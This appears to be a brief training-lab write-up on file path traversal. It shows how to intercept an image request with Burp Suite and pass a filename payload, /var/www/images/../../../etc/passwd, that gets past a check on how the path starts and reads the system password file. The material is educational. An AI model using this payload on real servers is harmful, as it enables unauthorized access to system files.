Skip to main content

File path traversal, validation of start of path

1

Let's access the image through the browser.

2

We can now intercept this request in Burp Suite using the Proxy.

3

Now, we can forward the request to the Repeater to makes changes in it.

Let's change the filename parameter to the following and forward the request:

/etc/passwd

4

The server requires the user-supplied filename to start with /var/www/images.

/var/www/images/../../../etc/passwd

5

We have successfully solved the lab.

6